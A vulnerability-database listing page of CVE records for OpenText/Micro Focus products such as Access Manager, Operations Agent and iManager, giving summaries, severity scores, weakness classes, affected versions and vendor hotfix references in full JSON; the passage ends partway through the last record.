Search

Find a vulnerability

Search criteria

    543 vulnerabilities by microfocus

    CVE-2026-11878 (GCVE-0-2026-11878)

    Vulnerability from nvd – Published: 2026-06-24 14:01 – Updated: 2026-06-24 15:07
    VLAI
    Title
    Reflected Cross-Site Scripting vulnerability in OpenText Access Manager
    Summary
    Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in OpenText Access Manager allows Cross-Site Scripting (XSS). This issue affects Access Manager: from 5.1 through 5.1.2.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-79 - Improper neutralization of input during web page generation ('cross-site scripting')
    Assigner
    References
    Impacted products
    Vendor Product Version
    OpenText Access Manager Affected: 5.1 , ≤ 5.1.2 (server)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-11878",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-06-24T15:04:47.680943Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-06-24T15:07:17.251Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "Access Manager",
              "vendor": "OpenText",
              "versions": [
                {
                  "lessThanOrEqual": "5.1.2",
                  "status": "affected",
                  "version": "5.1",
                  "versionType": "server"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "Improper neutralization of input during web page generation (\u0027cross-site scripting\u0027) vulnerability in OpenText Access Manager allows Cross-Site Scripting (XSS).\u003cp\u003eThis issue affects Access Manager: from 5.1 through 5.1.2.\u003c/p\u003e"
                }
              ],
              "value": "Improper neutralization of input during web page generation (\u0027cross-site scripting\u0027) vulnerability in OpenText Access Manager allows Cross-Site Scripting (XSS).\n\nThis issue affects Access Manager: from 5.1 through 5.1.2."
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-63",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-63 Cross-Site Scripting (XSS)"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV4_0": {
                "Automatable": "NOT_DEFINED",
                "Recovery": "NOT_DEFINED",
                "Safety": "NOT_DEFINED",
                "attackComplexity": "HIGH",
                "attackRequirements": "PRESENT",
                "attackVector": "NETWORK",
                "baseScore": 8.2,
                "baseSeverity": "HIGH",
                "exploitMaturity": "NOT_DEFINED",
                "privilegesRequired": "NONE",
                "providerUrgency": "NOT_DEFINED",
                "subAvailabilityImpact": "NONE",
                "subConfidentialityImpact": "LOW",
                "subIntegrityImpact": "NONE",
                "userInteraction": "NONE",
                "valueDensity": "NOT_DEFINED",
                "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N",
                "version": "4.0",
                "vulnAvailabilityImpact": "NONE",
                "vulnConfidentialityImpact": "HIGH",
                "vulnIntegrityImpact": "NONE",
                "vulnerabilityResponseEffort": "NOT_DEFINED"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-79",
                  "description": "CWE-79 Improper neutralization of input during web page generation (\u0027cross-site scripting\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-06-24T14:01:26.437Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "url": "https://portal.microfocus.com/s/article/KM000047449"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Reflected Cross-Site Scripting vulnerability in OpenText Access Manager",
          "x_generator": {
            "engine": "Vulnogram 1.0.2"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2026-11878",
        "datePublished": "2026-06-24T14:01:26.437Z",
        "dateReserved": "2026-06-10T13:20:08.609Z",
        "dateUpdated": "2026-06-24T15:07:17.251Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-11877 (GCVE-0-2026-11877)

    Vulnerability from nvd – Published: 2026-06-24 14:01 – Updated: 2026-06-24 15:02
    VLAI
    Title
    Missing Authorization Vulnerability in OpenText Access Manager
    Summary
    An unauthorized user can modify configuration through API calls that affects the OpenText Access Manager. This issue affects Access Manager before 5.1.3.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-648 - Incorrect use of privileged APIs
    Assigner
    References
    Impacted products
    Vendor Product Version
    OpenText Access Manager Affected: 5.1 , ≤ 5.1.2 (server)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-11877",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-06-24T15:01:47.754068Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-06-24T15:02:15.542Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "Access Manager",
              "vendor": "OpenText",
              "versions": [
                {
                  "lessThanOrEqual": "5.1.2",
                  "status": "affected",
                  "version": "5.1",
                  "versionType": "server"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cspan\u003eAn unauthorized user can modify configuration through API\ncalls that affects the OpenText Access\nManager\u003c/span\u003e.\u0026nbsp;\u003cspan\u003eThis issue affects Access Manager before 5.1.3.\u003c/span\u003e"
                }
              ],
              "value": "An unauthorized user can modify configuration through API\ncalls that affects the OpenText Access\nManager.\u00a0This issue affects Access Manager before 5.1.3."
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-1",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-1 Accessing Functionality Not Properly Constrained by ACLs"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV4_0": {
                "Automatable": "NOT_DEFINED",
                "Recovery": "NOT_DEFINED",
                "Safety": "NOT_DEFINED",
                "attackComplexity": "HIGH",
                "attackRequirements": "PRESENT",
                "attackVector": "NETWORK",
                "baseScore": 6.3,
                "baseSeverity": "MEDIUM",
                "exploitMaturity": "NOT_DEFINED",
                "privilegesRequired": "NONE",
                "providerUrgency": "NOT_DEFINED",
                "subAvailabilityImpact": "NONE",
                "subConfidentialityImpact": "LOW",
                "subIntegrityImpact": "LOW",
                "userInteraction": "NONE",
                "valueDensity": "NOT_DEFINED",
                "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N",
                "version": "4.0",
                "vulnAvailabilityImpact": "NONE",
                "vulnConfidentialityImpact": "NONE",
                "vulnIntegrityImpact": "LOW",
                "vulnerabilityResponseEffort": "NOT_DEFINED"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-648",
                  "description": "CWE-648 Incorrect use of privileged APIs",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-06-24T14:01:38.193Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "url": "https://portal.microfocus.com/s/article/KM000047450"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Missing Authorization Vulnerability in OpenText Access Manager",
          "x_generator": {
            "engine": "Vulnogram 1.0.2"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2026-11877",
        "datePublished": "2026-06-24T14:01:38.193Z",
        "dateReserved": "2026-06-10T13:19:47.916Z",
        "dateUpdated": "2026-06-24T15:02:15.542Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-2123 (GCVE-0-2026-2123)

    Vulnerability from nvd – Published: 2026-03-31 17:18 – Updated: 2026-03-31 18:00 X_Oa_Privilege_Escalation
    VLAI
    Title
    Privilege escalation vulnerability in Operations Agent
    Summary
    A security audit identified a privilege escalation vulnerability in Operations Agent(<=OA 12.29) on Windows. Under specific conditions Operations Agent may run executables from specific writeable locations.Thanks to Manuel Rickli & Philippe Leiser of Oneconsult AG for reporting this vulnerability
    SSVC
    Exploitation: none Automatable: no Technical Impact: total
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-280 - Improper handling of insufficient permissions or privileges
    Assigner
    References
    Impacted products
    Vendor Product Version
    OpenText Operations Agent Affected: OA 12.22 , ≤ OA 12.29 (custom)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-2123",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-03-31T17:58:14.103027Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-03-31T18:00:56.901Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "collectionURL": "https://gitlab.otxlab.net/itom/opr/oa/OvEaAgt",
              "defaultStatus": "unaffected",
              "modules": [
                "libopc_r"
              ],
              "packageName": "OvEaAgt",
              "platforms": [
                "Windows"
              ],
              "product": "Operations Agent",
              "programFiles": [
                "ntproc.c"
              ],
              "repo": "https://gitlab.otxlab.net/itom/opr/oa/OvEaAgt",
              "vendor": "OpenText",
              "versions": [
                {
                  "changes": [
                    {
                      "at": "OA 12.30",
                      "status": "unaffected"
                    }
                  ],
                  "lessThanOrEqual": "OA 12.29",
                  "status": "affected",
                  "version": "OA 12.22",
                  "versionType": "custom"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cdiv\u003e\u003cp\u003eA security audit identified a privilege escalation\nvulnerability in Operations Agent(\u0026lt;=OA 12.29) on Windows. Under specific conditions\nOperations Agent may run executables from specific writeable locations.\u003cspan\u003eThanks to Manuel Rickli \u0026amp; Philippe Leiser of\nOneconsult AG for reporting this vulnerability\u003c/span\u003e\u003c/p\u003e\u003c/div\u003e"
                }
              ],
              "value": "A security audit identified a privilege escalation\nvulnerability in Operations Agent(\u003c=OA 12.29) on Windows. Under specific conditions\nOperations Agent may run executables from specific writeable locations.Thanks to Manuel Rickli \u0026 Philippe Leiser of\nOneconsult AG for reporting this vulnerability"
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-122",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-122 Privilege Abuse"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV4_0": {
                "Automatable": "NOT_DEFINED",
                "Recovery": "NOT_DEFINED",
                "Safety": "NOT_DEFINED",
                "attackComplexity": "LOW",
                "attackRequirements": "NONE",
                "attackVector": "LOCAL",
                "baseScore": 8.6,
                "baseSeverity": "HIGH",
                "exploitMaturity": "NOT_DEFINED",
                "privilegesRequired": "LOW",
                "providerUrgency": "NOT_DEFINED",
                "subAvailabilityImpact": "HIGH",
                "subConfidentialityImpact": "HIGH",
                "subIntegrityImpact": "HIGH",
                "userInteraction": "PASSIVE",
                "valueDensity": "NOT_DEFINED",
                "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
                "version": "4.0",
                "vulnAvailabilityImpact": "HIGH",
                "vulnConfidentialityImpact": "HIGH",
                "vulnIntegrityImpact": "HIGH",
                "vulnerabilityResponseEffort": "NOT_DEFINED"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-280",
                  "description": "CWE-280 Improper handling of insufficient permissions or privileges",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-03-31T17:18:43.202Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "tags": [
                "customer-entitlement"
              ],
              "url": "https://portal.microfocus.com/s/article/KM000046068"
            }
          ],
          "solutions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eThe hotfix can be downloaded from the\u0026nbsp;\u003ca href=\"https://marketplace.opentext.com/itom/content/operations-agent-hotfix-for-cve-2026-2123-privilege-escalation/\" title=\"https://marketplace.opentext.com/itom/content/operations-agent-hotfix-for-cve-2026-2123-privilege-escalation/\"\u003eMarketplace\u003c/a\u003e\u0026nbsp;for the OA versions mentioned below.\u0026nbsp;\u003c/p\u003e\u003cp\u003ePlease follow the readme.txt\nincluded in the hotfix zip file for\u0026nbsp;install instructions.\u0026nbsp;\u003c/p\u003e\u003cp\u003eOA 12.24 - HFWIN_1224028.tar,\nHFWIN_1224029.tar\u003c/p\u003e\u003cp\u003eOA 12.25 -\nHFWIN_1225045.tar,HFWIN_1225046.tar\u0026nbsp;\u003c/p\u003e\u003cp\u003eOA 12.26 - HFWIN_1226039.tar,\nHFWIN_1226040.tar\u003c/p\u003e\u003cp\u003eOA 12.27 - HFWIN_1227023.tar,\nHFWIN_1227024.tar\u003c/p\u003e\u003cp\u003eOA 12.28 - HFWIN_1228020.tar,\nHFWIN_1228021.tar\u003c/p\u003e\u003cp\u003eOA 12.29 - HFWIN_1229006.tar,\nHFWIN_1229007.tar\u003c/p\u003e\u003cp\u003e\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\u003c/p\u003e\u003cp\u003e\u0026nbsp;\u003c/p\u003e"
                }
              ],
              "value": "The hotfix can be downloaded from the\u00a0 Marketplace https://marketplace.opentext.com/itom/content/operations-agent-hotfix-for-cve-2026-2123-privilege-escalation/ \u00a0for the OA versions mentioned below.\u00a0\n\nPlease follow the readme.txt\nincluded in the hotfix zip file for\u00a0install instructions.\u00a0\n\nOA 12.24 - HFWIN_1224028.tar,\nHFWIN_1224029.tar\n\nOA 12.25 -\nHFWIN_1225045.tar,HFWIN_1225046.tar\u00a0\n\nOA 12.26 - HFWIN_1226039.tar,\nHFWIN_1226040.tar\n\nOA 12.27 - HFWIN_1227023.tar,\nHFWIN_1227024.tar\n\nOA 12.28 - HFWIN_1228020.tar,\nHFWIN_1228021.tar\n\nOA 12.29 - HFWIN_1229006.tar,\nHFWIN_1229007.tar"
            }
          ],
          "source": {
            "advisory": "2761008",
            "defect": [
              "2761008"
            ],
            "discovery": "EXTERNAL"
          },
          "tags": [
            "x_oa_privilege_escalation"
          ],
          "title": "Privilege escalation vulnerability in Operations Agent",
          "x_generator": {
            "engine": "Vulnogram 1.0.1"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2026-2123",
        "datePublished": "2026-03-31T17:18:43.202Z",
        "dateReserved": "2026-02-06T14:55:51.920Z",
        "dateUpdated": "2026-03-31T18:00:56.901Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2023-24467 (GCVE-0-2023-24467)

    Vulnerability from nvd – Published: 2024-11-22 15:34 – Updated: 2024-11-25 18:12
    VLAI
    Title
    Possible Command Injection in OpenText iManager
    Summary
    Possible Command Injection in iManager GET parameter has been discovered in OpenText™ iManager 3.2.6.0000.
    SSVC
    Exploitation: none Automatable: no Technical Impact: total
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-77 - Improper Neutralization of Special Elements used in a Command ('Command Injection')
    • CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
    Assigner
    Impacted products
    Vendor Product Version
    OpenText iManager Affected: 3.0.0 , ≤ 3.2.6.0200 (rpm, exe)
    Create a notification for this product.
    opentext imanager Affected: 3.0.0 , ≤ 3.2.6.0200 (rpm)
        cpe:2.3:a:opentext:imanager:*:*:*:*:*:*:*:*
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "affected": [
              {
                "cpes": [
                  "cpe:2.3:a:opentext:imanager:*:*:*:*:*:*:*:*"
                ],
                "defaultStatus": "unknown",
                "product": "imanager",
                "vendor": "opentext",
                "versions": [
                  {
                    "lessThanOrEqual": "3.2.6.0200",
                    "status": "affected",
                    "version": "3.0.0",
                    "versionType": "rpm"
                  }
                ]
              }
            ],
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2023-24467",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2024-11-25T18:09:55.699628Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2024-11-25T18:12:56.534Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "affected",
              "platforms": [
                "Windows",
                "Linux",
                "64 bit"
              ],
              "product": "iManager",
              "vendor": "OpenText",
              "versions": [
                {
                  "lessThanOrEqual": "3.2.6.0200",
                  "status": "affected",
                  "version": "3.0.0",
                  "versionType": "rpm, exe"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cstrong\u003ePossible Command Injection\n\n\n in iManager GET parameter \u003c/strong\u003e\u003cstrong\u003ehas been discovered in\nOpenText\u2122 \u003c/strong\u003e\u003cstrong\u003eiManager 3.2.6.0000\u003c/strong\u003e\u003cstrong\u003e.\u003cbr\u003e\u003c/strong\u003e"
                }
              ],
              "value": "Possible Command Injection\n\n\n in iManager GET parameter has been discovered in\nOpenText\u2122 iManager 3.2.6.0000."
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-88",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-88 OS Command Injection"
                }
              ]
            },
            {
              "capecId": "CAPEC-248",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-248 Command Injection"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-77",
                  "description": "CWE-77 Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            },
            {
              "descriptions": [
                {
                  "cweId": "CWE-78",
                  "description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2024-11-22T15:34:29.957Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "url": "https://www.netiq.com/documentation/imanager-32/pdfdoc/imanager326_patch3_releasenotes/imanager326_patch3_releasenotes.pdf"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Possible Command Injection in OpenText iManager",
          "x_generator": {
            "engine": "Vulnogram 0.1.0-dev"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2023-24467",
        "datePublished": "2024-11-22T15:34:29.957Z",
        "dateReserved": "2023-01-23T21:31:58.769Z",
        "dateUpdated": "2024-11-25T18:12:56.534Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2023-24466 (GCVE-0-2023-24466)

    Vulnerability from nvd – Published: 2024-11-22 15:34 – Updated: 2024-11-25 18:12
    VLAI
    Title
    Possible XML External Entity Injection in OpenText iManager
    Summary
    Possible XML External Entity Injection in iManager GET parameter has been discovered in OpenText™ iManager 3.2.6.0200.
    SSVC
    Exploitation: none Automatable: yes Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-611 - Improper Restriction of XML External Entity Reference
    Assigner
    Impacted products
    Vendor Product Version
    OpenText iManager Affected: 3.0.0 , ≤ 3.2.6.0200 (rpm, exe)
    Create a notification for this product.
    opentext imanager Affected: 3.0.0 , ≤ 3.2.6.0200 (rpm)
        cpe:2.3:a:opentext:imanager:*:*:*:*:*:*:*:*
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "affected": [
              {
                "cpes": [
                  "cpe:2.3:a:opentext:imanager:*:*:*:*:*:*:*:*"
                ],
                "defaultStatus": "unknown",
                "product": "imanager",
                "vendor": "opentext",
                "versions": [
                  {
                    "lessThanOrEqual": "3.2.6.0200",
                    "status": "affected",
                    "version": "3.0.0",
                    "versionType": "rpm"
                  }
                ]
              }
            ],
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2023-24466",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2024-11-25T18:09:43.291349Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2024-11-25T18:12:11.291Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "affected",
              "platforms": [
                "Windows",
                "Linux",
                "64 bit"
              ],
              "product": "iManager",
              "vendor": "OpenText",
              "versions": [
                {
                  "lessThanOrEqual": "3.2.6.0200",
                  "status": "affected",
                  "version": "3.0.0",
                  "versionType": "rpm, exe"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cstrong\u003ePossible XML External Entity Injection\n\n\n in iManager GET parameter \u003c/strong\u003e\u003cstrong\u003ehas been discovered in\nOpenText\u2122 \u003c/strong\u003e\u003cstrong\u003eiManager 3.2.6.0200\u003c/strong\u003e\u003cstrong\u003e.\u003cbr\u003e\u003c/strong\u003e"
                }
              ],
              "value": "Possible XML External Entity Injection\n\n\n in iManager GET parameter has been discovered in\nOpenText\u2122 iManager 3.2.6.0200."
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-221",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-221 Data Serialization External Entities Blowup"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-611",
                  "description": "CWE-611 Improper Restriction of XML External Entity Reference",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2024-11-22T15:34:31.683Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "url": "https://www.netiq.com/documentation/imanager-32/pdfdoc/imanager326_patch3_releasenotes/imanager326_patch3_releasenotes.pdf"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Possible XML External Entity Injection in OpenText iManager",
          "x_generator": {
            "engine": "Vulnogram 0.1.0-dev"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2023-24466",
        "datePublished": "2024-11-22T15:34:31.683Z",
        "dateReserved": "2023-01-23T21:31:58.769Z",
        "dateUpdated": "2024-11-25T18:12:11.291Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2022-26324 (GCVE-0-2022-26324)

    Vulnerability from nvd – Published: 2024-11-22 15:34 – Updated: 2024-11-26 14:20
    VLAI
    Title
    Possible XSS in iManager URL for access Component
    Summary
    Possible XSS in iManager URL for access Component has been discovered in OpenText™ iManager 3.2.6.0000.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-79 - Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting')
    Assigner
    Impacted products
    Vendor Product Version
    OpenText iManager Affected: 3.0.0 , ≤ 3.2.6.0000 (rpm, exe)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2022-26324",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2024-11-22T17:44:21.253037Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2024-11-26T14:20:05.412Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "affected",
              "platforms": [
                "Windows",
                "Linux",
                "64 bit"
              ],
              "product": "iManager",
              "vendor": "OpenText",
              "versions": [
                {
                  "lessThanOrEqual": "3.2.6.0000",
                  "status": "affected",
                  "version": "3.0.0",
                  "versionType": "rpm, exe"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cstrong\u003ePossible XSS in iManager URL for access Component \u003c/strong\u003e\u003cstrong\u003ehas been discovered in\nOpenText\u2122 \u003c/strong\u003e\u003cstrong\u003eiManager 3.2.6.0000\u003c/strong\u003e\u003cstrong\u003e. \u003cbr\u003e\u003c/strong\u003e"
                }
              ],
              "value": "Possible XSS in iManager URL for access Component has been discovered in\nOpenText\u2122 iManager 3.2.6.0000."
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-63",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-63 Cross-Site Scripting (XSS)"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 7.6,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "LOW",
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "CHANGED",
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-79",
